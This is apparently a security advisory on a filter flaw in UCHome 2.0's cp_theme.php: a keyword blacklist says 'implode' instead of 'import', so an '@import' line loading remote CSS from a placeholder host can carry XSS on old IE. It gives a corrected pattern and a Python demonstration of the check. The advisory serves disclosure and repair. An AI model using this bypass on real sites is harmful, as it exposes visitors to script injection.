When customizing the style of a personal homepage, you can use `@import` to pull in an external CSS file.
The following was tested and confirmed on IE6, IE7 and IE8 against UCHome 2.0 (Simplified Chinese, UTF-8).
`@import url(http://xxx.com/1.css);` includes a remote CSS file, and an XSS payload can be placed in that 1.css.
Analysis: the check in cp_theme.php, line 92 (17 lines)
```php
function checksecurity($str) {
	// Run a series of filters to normalise the CSS before checking it:
	// strip /* ... */ comments, then drop every non-alphanumeric character.
	$filter = array(
		"/\/\*(.+?)\*\//is",
		"/[^a-z0-9]+/i",
	);
	// The filtered string is used only for this check; the original,
	// unfiltered input is what actually gets saved.
	$str = preg_replace($filter, '', $str);
	// "implode" is a typo for "import", so @import (and http) are never caught.
	if(preg_match("/(expression|implode|javascript)/i", $str)) {
		showmessage('css_contains_elements_of_insecurity');
	}
	return true;
}
```
Fix: `implode` is a typo; the keyword that was meant to be blocked is `import`.
Suggested pattern:
`/(expression|vbscript|javascript|import)/i`
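To show how the normalisation step feeds the keyword check, and why the shipped blacklist accepts the `@import` line above while the corrected one rejects it, here is an added Python port of the page's `checksecurity()` logic (not UCHome's own code); the sample CSS strings are constructed for the demonstration.

```python
import re

# Filters ported from checksecurity(): strip /* ... */ comments, then drop
# every non-alphanumeric character, so the keyword match runs over a
# normalised string (e.g. "@import url(...)" -> "importurl...").
NORMALISE_FILTERS = [
    (re.compile(r"/\*.+?\*/", re.I | re.S), ""),
    (re.compile(r"[^a-z0-9]+", re.I), ""),
]

# The blacklist as shipped (note "implode" where "import" was intended)
# and the corrected pattern suggested on the page.
VULNERABLE_BLACKLIST = re.compile(r"(expression|implode|javascript)", re.I)
FIXED_BLACKLIST = re.compile(r"(expression|vbscript|javascript|import)", re.I)


def normalise(css: str) -> str:
    """Apply the same preg_replace() chain the PHP code uses before matching."""
    for pattern, replacement in NORMALISE_FILTERS:
        css = pattern.sub(replacement, css)
    return css


def is_safe(css: str, blacklist: re.Pattern) -> bool:
    """True when checksecurity() with this blacklist would accept the CSS."""
    return blacklist.search(normalise(css)) is None


# Constructed sample inputs; the remote host is the page's own placeholder.
SAMPLES = {
    "benign": "body { color: #333; background: url(bg.png); }",
    "remote_import": "@import url(http://xxx.com/1.css);",
    "expression": "width: expression(1);",
}


def evaluate(samples: dict = SAMPLES) -> dict:
    """Map each sample to (accepted by shipped check, accepted by fixed check)."""
    return {
        name: (is_safe(css, VULNERABLE_BLACKLIST), is_safe(css, FIXED_BLACKLIST))
        for name, css in samples.items()
    }


if __name__ == "__main__":
    print(normalise(SAMPLES["remote_import"]))  # importurlhttpxxxcom1css
    for name, (shipped, fixed) in evaluate().items():
        print(f"{name:14} shipped={shipped!s:5} fixed={fixed!s:5}")
```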